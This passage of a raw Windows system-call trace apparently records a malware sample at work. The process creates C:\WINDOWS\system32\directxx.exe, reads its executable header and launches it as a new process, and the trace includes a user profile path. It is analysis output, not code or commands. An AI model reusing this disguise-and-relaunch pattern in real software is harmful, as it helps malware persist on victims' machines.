}, 1240988, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03594 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\explorer.exe"}, 1240988, ... ) }, 1240988, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03595 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system\explorer.exe"}, 1240988, ... ) }, 1240988, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03596 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\explorer.exe"}, 1240988, ... ) }, 1240988, ... ) == 0x0 03597 896 NtCreateFile (0x80100080, {24, 0, 0x40, 0, 1241784, (0x80100080, {24, 0, 0x40, 0, 1241784, "\??\C:\WINDOWS\explorer.exe"}, 0x0, 128, 1, 1, 96, 0, 0, ... 336, {status=0x0, info=1}, ) }, 0x0, 128, 1, 1, 96, 0, 0, ... 336, {status=0x0, info=1}, ) == 0x0 03598 896 NtQueryInformationFile (336, 1241876, 40, Basic, ... {status=0x0, info=40}, ) == 0x0 03599 896 NtClose (336, ... ) == 0x0 03600 896 NtCreateFile (0x40100080, {24, 0, 0x40, 0, 1241784, (0x40100080, {24, 0, 0x40, 0, 1241784, "\??\C:\WINDOWS\system32\directxx.exe"}, 0x0, 128, 2, 1, 96, 0, 0, ... 336, {status=0x0, info=1}, ) }, 0x0, 128, 2, 1, 96, 0, 0, ... 336, {status=0x0, info=1}, ) == 0x0 03601 896 NtSetInformationFile (336, 1241876, 40, Basic, ... {status=0x0, info=0}, ) == 0x0 03602 896 NtClose (336, ... ) == 0x0 03603 896 NtOpenFile (0x100100, {24, 0, 0x40, 0, 0, (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\directxx.exe"}, 7, 2113568, ... 336, {status=0x0, info=1}, ) }, 7, 2113568, ... 336, {status=0x0, info=1}, ) == 0x0 03604 896 NtSetInformationFile (336, 1242124, 40, Basic, ... {status=0x0, info=0}, ) == 0x0 03605 896 NtClose (336, ... ) == 0x0 03606 896 NtOpenProcess (0x100000, {24, 0, 0x2, 0, 0, 0x0}, {1252, 0}, ... 336, ) == 0x0 03607 896 NtQueryInformationJobObject (0, BasicUIRestrictions, 4, ... ) == STATUS_ACCESS_DENIED 03608 896 NtOpenFile (0x1000a1, {24, 0, 0x40, 0, 0, (0x1000a1, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\directxx.exe"}, 5, 96, ... 332, {status=0x0, info=1}, ) }, 5, 96, ... 332, {status=0x0, info=1}, ) == 0x0 03609 896 NtCreateSection (0xf001f, 0x0, 0x0, 16, 16777216, 332, ... 340, ) == 0x0 03610 896 NtQueryVolumeInformationFile (332, 1238500, 8, Device, ... {status=0x0, info=8}, ) == 0x0 03611 896 NtWaitForSingleObject (56, 0, {-1000000, -1}, ... ) == 0x0 03612 896 NtReleaseMutant (56, ... 0x0, ) == 0x0 03613 896 NtCreateFile (0x80100080, {24, 0, 0x40, 0, 0, (0x80100080, {24, 0, 0x40, 0, 0, "\SystemRoot\AppPatch\sysmain.sdb"}, 0x0, 128, 1, 1, 96, 0, 0, ... 344, {status=0x0, info=1}, ) }, 0x0, 128, 1, 1, 96, 0, 0, ... 344, {status=0x0, info=1}, ) == 0x0 03614 896 NtQueryInformationFile (344, 1236756, 24, Standard, ... {status=0x0, info=24}, ) == 0x0 03615 896 NtCreateSection (0x4, 0x0, 0x0, 2, 134217728, 344, ... 348, ) == 0x0 03616 896 NtMapViewOfSection (348, -1, (0x0), 0, 0, 0x0, 0, 2, 0, 2, ... (0x1000000), 0x0, 1191936, ) == 0x0 03617 896 NtQueryInformationFile (344, 1236856, 24, Standard, ... {status=0x0, info=24}, ) == 0x0 03618 896 NtCreateFile (0x80100080, {24, 0, 0x40, 0, 0, (0x80100080, {24, 0, 0x40, 0, 0, "\SystemRoot\AppPatch\systest.sdb"}, 0x0, 128, 1, 1, 96, 0, 0, ... ) }, 0x0, 128, 1, 1, 96, 0, 0, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03619 896 NtOpenKey (0x101, {24, 0, 0x40, 0, 0, (0x101, {24, 0, 0x40, 0, 0, "\Registry\Machine\System\WPA\TabletPC"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03620 896 NtOpenKey (0x101, {24, 0, 0x40, 0, 0, (0x101, {24, 0, 0x40, 0, 0, "\Registry\Machine\SYSTEM\WPA\MediaCenter"}, ... 352, ) }, ... 352, ) == 0x0 03621 896 NtQueryValueKey (352, (352, "Installed", Partial, 256, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 256, ... TitleIdx=0, Type=4, Data= (352, "Installed", Partial, 256, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 03622 896 NtClose (352, ... ) == 0x0 03623 896 NtCreateFile (0x120116, {24, 0, 0x40, 0, 0, (0x120116, {24, 0, 0x40, 0, 0, "\Device\NamedPipe\ShimViewer"}, 0x0, 128, 0, 1, 0, 0, 0, ... ) }, 0x0, 128, 0, 1, 0, 0, 0, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03624 896 NtOpenFile (0x100001, {24, 0, 0x40, 0, 0, (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\"}, 3, 16417, ... 352, {status=0x0, info=1}, ) }, 3, 16417, ... 352, {status=0x0, info=1}, ) == 0x0 03625 896 NtQueryDirectoryFile (352, 0, 0, 0, 1234452, 616, BothDirectory, 1, (352, 0, 0, 0, 1234452, 616, BothDirectory, 1, "directxx.exe", 0, ... {status=0x0, info=118}, ) , 0, ... {status=0x0, info=118}, ) == 0x0 03626 896 NtClose (352, ... ) == 0x0 03627 896 NtQueryInformationProcess (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0 03628 896 NtSetInformationProcess (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0 03629 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\directxx.exe"}, 1234828, ... ) }, 1234828, ... ) == 0x0 03630 896 NtOpenFile (0x100001, {24, 0, 0x40, 0, 0, (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\"}, 3, 16417, ... 352, {status=0x0, info=1}, ) }, 3, 16417, ... 352, {status=0x0, info=1}, ) == 0x0 03631 896 NtQueryDirectoryFile (352, 0, 0, 0, 1234256, 616, BothDirectory, 1, (352, 0, 0, 0, 1234256, 616, BothDirectory, 1, "WINDOWS", 0, ... {status=0x0, info=108}, ) , 0, ... {status=0x0, info=108}, ) == 0x0 03632 896 NtClose (352, ... ) == 0x0 03633 896 NtOpenFile (0x100001, {24, 0, 0x40, 0, 0, (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\"}, 3, 16417, ... 352, {status=0x0, info=1}, ) }, 3, 16417, ... 352, {status=0x0, info=1}, ) == 0x0 03634 896 NtQueryDirectoryFile (352, 0, 0, 0, 1234256, 616, BothDirectory, 1, (352, 0, 0, 0, 1234256, 616, BothDirectory, 1, "system32", 0, ... {status=0x0, info=110}, ) , 0, ... {status=0x0, info=110}, ) == 0x0 03635 896 NtClose (352, ... ) == 0x0 03636 896 NtOpenFile (0x100001, {24, 0, 0x40, 0, 0, (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\"}, 3, 16417, ... 352, {status=0x0, info=1}, ) }, 3, 16417, ... 352, {status=0x0, info=1}, ) == 0x0 03637 896 NtQueryDirectoryFile (352, 0, 0, 0, 1234256, 616, BothDirectory, 1, (352, 0, 0, 0, 1234256, 616, BothDirectory, 1, "directxx.exe", 0, ... {status=0x0, info=118}, ) , 0, ... {status=0x0, info=118}, ) == 0x0 03638 896 NtClose (352, ... ) == 0x0 03639 896 NtQueryInformationProcess (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0 03640 896 NtSetInformationProcess (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0 03641 896 NtQueryInformationProcess (-1, DeviceMap, 36, ... {process info, class 23, size 36}, 0x0, ) == 0x0 03642 896 NtOpenKey (0x80000100, {24, 0, 0x40, 0, 0, (0x80000100, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03643 896 NtOpenThreadTokenEx (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN 03644 896 NtOpenProcessTokenEx (-1, 0x20008, 512, ... 352, ) == 0x0 03645 896 NtQueryInformationToken (352, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0 03646 896 NtClose (352, ... ) == 0x0 03647 896 NtOpenKey (0x80000100, {24, 0, 0x40, 0, 0, (0x80000100, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03648 896 NtOpenKey (0x80000100, {24, 0, 0x40, 0, 0, (0x80000100, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\directxx.exe"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03649 896 NtQueryInformationProcess (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0 03650 896 NtSetInformationProcess (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0 03651 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\directxx.exe"}, 1236080, ... ) }, 1236080, ... ) == 0x0 03652 896 NtOpenFile (0x100001, {24, 0, 0x40, 0, 0, (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\"}, 3, 16417, ... 352, {status=0x0, info=1}, ) }, 3, 16417, ... 352, {status=0x0, info=1}, ) == 0x0 03653 896 NtQueryDirectoryFile (352, 0, 0, 0, 1235508, 616, BothDirectory, 1, (352, 0, 0, 0, 1235508, 616, BothDirectory, 1, "WINDOWS", 0, ... {status=0x0, info=108}, ) , 0, ... {status=0x0, info=108}, ) == 0x0 03654 896 NtClose (352, ... ) == 0x0 03655 896 NtOpenFile (0x100001, {24, 0, 0x40, 0, 0, (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\"}, 3, 16417, ... 352, {status=0x0, info=1}, ) }, 3, 16417, ... 352, {status=0x0, info=1}, ) == 0x0 03656 896 NtQueryDirectoryFile (352, 0, 0, 0, 1235508, 616, BothDirectory, 1, (352, 0, 0, 0, 1235508, 616, BothDirectory, 1, "system32", 0, ... {status=0x0, info=110}, ) , 0, ... {status=0x0, info=110}, ) == 0x0 03657 896 NtClose (352, ... ) == 0x0 03658 896 NtOpenFile (0x100001, {24, 0, 0x40, 0, 0, (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\"}, 3, 16417, ... 352, {status=0x0, info=1}, ) }, 3, 16417, ... 352, {status=0x0, info=1}, ) == 0x0 03659 896 NtQueryDirectoryFile (352, 0, 0, 0, 1235508, 616, BothDirectory, 1, (352, 0, 0, 0, 1235508, 616, BothDirectory, 1, "directxx.exe", 0, ... {status=0x0, info=118}, ) , 0, ... {status=0x0, info=118}, ) == 0x0 03660 896 NtClose (352, ... ) == 0x0 03661 896 NtQueryInformationProcess (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0 03662 896 NtSetInformationProcess (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0 03663 896 NtWaitForSingleObject (56, 0, {-1000000, -1}, ... ) == 0x0 03664 896 NtQueryVolumeInformationFile (332, 1236736, 8, Device, ... {status=0x0, info=8}, ) == 0x0 03665 896 NtQueryInformationFile (332, 1236716, 40, Basic, ... {status=0x0, info=40}, ) == 0x0 03666 896 NtQueryInformationFile (332, 1236756, 24, Standard, ... {status=0x0, info=24}, ) == 0x0 03667 896 NtReleaseMutant (56, ... 0x0, ) == 0x0 03668 896 NtUnmapViewOfSection (-1, 0x1000000, ... ) == 0x0 03669 896 NtClose (348, ... ) == 0x0 03670 896 NtClose (344, ... ) == 0x0 03671 896 NtOpenThreadToken (-2, 0x2000000, 1, ... ) == STATUS_NO_TOKEN 03672 896 NtOpenProcessToken (-1, 0xa, ... 344, ) == 0x0 03673 896 NtOpenKey (0x2000000, {24, 28, 0x40, 0, 0, (0x2000000, {24, 28, 0x40, 0, 0, "Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers"}, ... 348, ) }, ... 348, ) == 0x0 03674 896 NtQueryKey (348, Basic, 520, ... {LastWrite={0x3a5edea,0x1c74da9}, TitleIdx=0, Name= (348, Basic, 520, ... {LastWrite={0x3a5edea,0x1c74da9}, TitleIdx=0, Name="CodeIdentifierso"}, 46, ) }, 46, ) == 0x0 03675 896 NtClose (348, ... ) == 0x0 03676 896 NtOpenKey (0x2000000, {24, 120, 0x40, 0, 0, (0x2000000, {24, 120, 0x40, 0, 0, "Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03677 896 NtOpenSymbolicLinkObject (0x1, {24, 0, 0x40, 0, 0, (0x1, {24, 0, 0x40, 0, 0, "\??\C:"}, ... 348, ) }, ... 348, ) == 0x0 03678 896 NtQuerySymbolicLinkObject (348, ... (348, ... "\Device\HarddiskVolume1", 48, ) , 48, ) == 0x0 03679 896 NtClose (348, ... ) == 0x0 03680 896 NtQueryVolumeInformationFile (332, 1236192, 8, Device, ... {status=0x0, info=8}, ) == 0x0 03681 896 NtQueryInformationFile (332, 1236308, 528, Name, ... {status=0x0, info=64}, ) == 0x0 03682 896 NtQueryInformationProcess (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0 03683 896 NtSetInformationProcess (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0 03684 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\directxx.exe"}, 1235388, ... ) }, 1235388, ... ) == 0x0 03685 896 NtOpenFile (0x100001, {24, 0, 0x40, 0, 0, (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\"}, 3, 16417, ... 348, {status=0x0, info=1}, ) }, 3, 16417, ... 348, {status=0x0, info=1}, ) == 0x0 03686 896 NtQueryDirectoryFile (348, 0, 0, 0, 1234816, 616, BothDirectory, 1, (348, 0, 0, 0, 1234816, 616, BothDirectory, 1, "WINDOWS", 0, ... {status=0x0, info=108}, ) , 0, ... {status=0x0, info=108}, ) == 0x0 03687 896 NtClose (348, ... ) == 0x0 03688 896 NtOpenFile (0x100001, {24, 0, 0x40, 0, 0, (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\"}, 3, 16417, ... 348, {status=0x0, info=1}, ) }, 3, 16417, ... 348, {status=0x0, info=1}, ) == 0x0 03689 896 NtQueryDirectoryFile (348, 0, 0, 0, 1234816, 616, BothDirectory, 1, (348, 0, 0, 0, 1234816, 616, BothDirectory, 1, "system32", 0, ... {status=0x0, info=110}, ) , 0, ... {status=0x0, info=110}, ) == 0x0 03690 896 NtClose (348, ... ) == 0x0 03691 896 NtOpenFile (0x100001, {24, 0, 0x40, 0, 0, (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\"}, 3, 16417, ... 348, {status=0x0, info=1}, ) }, 3, 16417, ... 348, {status=0x0, info=1}, ) == 0x0 03692 896 NtQueryDirectoryFile (348, 0, 0, 0, 1234816, 616, BothDirectory, 1, (348, 0, 0, 0, 1234816, 616, BothDirectory, 1, "directxx.exe", 0, ... {status=0x0, info=118}, ) , 0, ... {status=0x0, info=118}, ) == 0x0 03693 896 NtClose (348, ... ) == 0x0 03694 896 NtQueryInformationProcess (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0 03695 896 NtSetInformationProcess (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0 03696 896 NtQueryInformationFile (332, 1238348, 24, Standard, ... {status=0x0, info=24}, ) == 0x0 03697 896 NtCreateSection (0xf0005, 0x0, {179200, 0}, 2, 134217728, 332, ... 348, ) == 0x0 03698 896 NtMapViewOfSection (348, -1, (0x0), 0, 0, {0, 0}, 179200, 1, 0, 2, ... (0x1000000), {0, 0}, 180224, ) == 0x0 03699 896 NtClose (348, ... ) == 0x0 03700 896 NtUnmapViewOfSection (-1, 0x1000000, ... ) == 0x0 03701 896 NtOpenKey (0x1, {24, 0, 0x40, 0, 0, (0x1, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers"}, ... 348, ) }, ... 348, ) == 0x0 03702 896 NtQueryValueKey (348, (348, "LogFileName", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03703 896 NtClose (348, ... ) == 0x0 03704 896 NtQueryInformationToken (344, User, 128, ... {token info, class 1, size 36}, 36, ) == 0x0 03705 896 NtQueryInformationToken (344, 15, 4, ... {token info, class 15, size 4}, 4, ) == 0x0 03706 896 NtClose (344, ... ) == 0x0 03707 896 NtQuerySection (340, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0 03708 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\directxx.exe"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03709 896 NtQuerySystemInformation (71, 4, ... {system info, class 71, size 4}, 0x0, ) == 0x0 03710 896 NtCreateProcessEx (1240272, 2035711, 0, -1, 4, 340, 0, 0, 0, ... ) == 0x0 03711 896 NtSetInformationProcess (344, PriorityClass, {process info, class 18, size 2}, 512, ... ) == 0x0 03712 896 NtQueryInformationProcess (344, Basic, 24, ... {ExitStatus=0x103,PebBaseAddress=0x7ffdc000,AffinityMask=0x1,BasePriority=8,Pid=1600,ParentPid=1252,}, 0x0, ) == 0x0 03713 896 NtReadVirtualMemory (344, 0x7ffdc008, 4, ... (344, 0x7ffdc008, 4, ... "\0\0@\0", 0x0, ) , 0x0, ) == 0x0 03714 896 NtOpenFile (0x1200a9, {24, 0, 0x40, 0, 0, (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\directxx.exe.Manifest"}, 1, 96, ... ) }, 1, 96, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 03715 896 NtReadVirtualMemory (344, 0x400000, 4096, ... (344, 0x400000, 4096, ... "MZ\220\0\3\0\0\0\4\0\0\0\377\377\0\0\270\0\0\0\0\0\0\0@\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\350\0\0\0\16\37\272\16\0\264\11\315!\270\1L\315!This program cannot be run in DOS mode.\15\15\12$\0\0\0\0\0\0\06\357\376\372r\216\220\251r\216\220\251r\216\220\251r\216\221\251\371\216\220\251\261\201\315\251u\216\220\251\11\222\234\251q\216\220\251\361\222\236\251j\216\220\251\35\221\233\251~\216\220\251\35\221\232\251\17\216\220\251&\255\240\251s\216\220\251&\255\241\251D\216\220\251Richr\216\220\251\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0PE\0\0L\1\6\0\1Y\37H\0\0\0\0\0\0\0\0\340\0\17\3\13\1\6\0\0\0\0\0\0\270\2\0\0\0\0\0\323\333\21\0\0\300\21\0\0@\2\0\0\0@\0\0\20\0\0\0\2\0\0\4\0\0\0\0\0\0\0\4\0\0\0\0\0\0\0\0p\23\0\0\4\0\0\0\0\0\0\2\0\0\0\0\0\20\0\0\20\0\0\0\0\20\0\0\20\0\0\0\0\0\0\20\0\0\0\0\0\0\0\0\0\0\0,\353\22\0<\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\340\22\0`\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\00\0ext\0\0\0\366(\2\0\0\20\0\0\0:\1\0", 4096, ) , 4096, ) == 0x0 03716 896 NtQueryDebugFilterState (53, 2, ... ) == 0x0 03717 896 NtQueryInformationProcess (344, Basic, 24, ... {ExitStatus=0x103,PebBaseAddress=0x7ffdc000,AffinityMask=0x1,BasePriority=8,Pid=1600,ParentPid=1252,}, 0x0, ) == 0x0 03718 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32"}, 1239224, ... ) }, 1239224, ... ) == 0x0 03719 896 NtAllocateVirtualMemory (-1, 0, 0, 2416, 4096, 4, ... 14417920, 4096, ) == 0x0 03720 896 NtAllocateVirtualMemory (344, 0, 0, 6432, 4096, 4, ... 65536, 8192, ) == 0x0 03721 896 NtWriteVirtualMemory (344, 0x10000, (344, 0x10000, "=\0A\0:\0=\0A\0:\0\\0\0\0=\0C\0:\0=\0C\0:\0\\0s\0c\0r\0i\0p\0t\0s\0\0\0=\0U\0:\0=\0U\0:\0\\0\0\0A\0L\0L\0U\0S\0E\0R\0S\0P\0R\0O\0F\0I\0L\0E\0=\0C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0A\0l\0l\0 \0U\0s\0e\0r\0s\0\0\0A\0P\0P\0D\0A\0T\0A\0=\0C\0:\0\\0D\0o\0c\0u\0m\0e\0n\0t\0s\0 \0a\0n\0d\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0M\0a\0r\0t\0i\0m\0 \0C\0a\0r\0b\0o\0n\0e\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\0\0A\0T\0L\0_\0I\0N\0C\0_\0P\0A\0T\0H\0=\0C\0:\0\\0W\0I\0N\0D\0D\0K\0\\03\07\09\00\0~\01\0.\01\08\03\0\\0i\0n\0c\0\0\0A\0T\0L\0_\0I\0N\0C\0_\0R\0O\0O\0T\0=\0C\0:\0\\0W\0I\0N\0D\0D\0K\0\\03\07\09\00\0~\01\0.\01\08\03\0\\0i\0n\0c\0\0\0A\0T\0L\0_\0L\0I\0B\0_\0P\0A\0T\0H\0=\0C\0:\0\\0W\0I\0N\0D\0D\0K\0\\03\07\0", 6432, ... 0x0, ) , 6432, ... 0x0, ) == 0x0 03722 896 NtAllocateVirtualMemory (344, 0, 0, 2416, 4096, 4, ... 131072, 4096, ) == 0x0 03723 896 NtWriteVirtualMemory (344, 0x20000, (344, 0x20000, "\0\20\0\0p\11\0\0\0\0\0\0\0\0\0\0\377\377\377\377\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0&\0\10\2\220\2\0\0\16\0\0\0\364\3\366\3\230\4\0\0@\0B\0\220\10\0\0r\0t\0\324\10\0\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\0\0\0\0\2\0H\11\0\0\36\0 \0L\11\0\0\0\0\2\0l\11\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 2416, ... 0x0, ) , 2416, ... 0x0, ) == 0x0 03724 896 NtWriteVirtualMemory (344, 0x7ffdc010, (344, 0x7ffdc010, "\0\0\2\0", 4, ... 0x0, ) , 4, ... 0x0, ) == 0x0 03725 896 NtWriteVirtualMemory (344, 0x7ffdc1e8, (344, 0x7ffdc1e8, "\0\0\0\0", 4, ... 0x0, ) , 4, ... 0x0, ) == 0x0 03726 896 NtFreeVirtualMemory (-1, (0xdc0000), 0, 32768, ... (0xdc0000), 4096, ) == 0x0 03727 896 NtAllocateVirtualMemory (344, 0, 0, 1048576, 8192, 4, ... 196608, 1048576, ) == 0x0 03728 896 NtAllocateVirtualMemory (344, 1236992, 0, 8192, 4096, 4, ... 1236992, 8192, ) == 0x0 03729 896 NtProtectVirtualMemory (344, (0x12e000), 4096, 260, ... (0x12e000), 4096, 4, ) == 0x0 03730 896 NtCreateThread (0x1f03ff, 0x0, 344, 1240280, 1239944, 1, ... 348, {1600, 1948}, ) == 0x0 03731 896 NtRequestWaitReplyPort (24, {168, 196, new_msg, 0, 1319080, 1241128, 2089879920, 2090329280} (24, {168, 196, new_msg, 0, 1319080, 1241128, 2089879920, 2090329280} "\0\0\0\0\0\0\1\0\0\0\0\0\0\374\375\177[\1\0\0\\1\0\0@\6\0\0\234\7\0\0\0\0\0\0\0\0\0\0\10\0\0\0\0\0\0\0\32\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\300\375\177\0\0\0\0\0\0\22\0\0\0\0\0" ... {168, 196, reply, 0, 1252, 896, 82428, 0} "\0\0\0\0\0\0\1\0\0\0\0\0\0\374\375\177X\1\0\0\\1\0\0@\6\0\0\234\7\0\0\0\0\0\0\0\0\0\0\10\0\0\0\0\0\0\0\32\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\300\375\177\0\0\0\0\0\0\22\0\0\0\0\0" ) ... {168, 196, reply, 0, 1252, 896, 82428, 0} (24, {168, 196, new_msg, 0, 1319080, 1241128, 2089879920, 2090329280} "\0\0\0\0\0\0\1\0\0\0\0\0\0\374\375\177[\1\0\0\\1\0\0@\6\0\0\234\7\0\0\0\0\0\0\0\0\0\0\10\0\0\0\0\0\0\0\32\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\300\375\177\0\0\0\0\0\0\22\0\0\0\0\0" ... {168, 196, reply, 0, 1252, 896, 82428, 0} "\0\0\0\0\0\0\1\0\0\0\0\0\0\374\375\177X\1\0\0\\1\0\0@\6\0\0\234\7\0\0\0\0\0\0\0\0\0\0\10\0\0\0\0\0\0\0\32\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\300\375\177\0\0\0\0\0\0\22\0\0\0\0\0" ) ) == 0x0 03732 896 NtResumeThread (348, ... 1, ) == 0x0 03733 896 NtClose (332, ... ) == 0x0 03734 896 NtClose (340, ... ) == 0x0 03735 896 NtDelayExecution (0, {-2000000, -1}, ... ) == 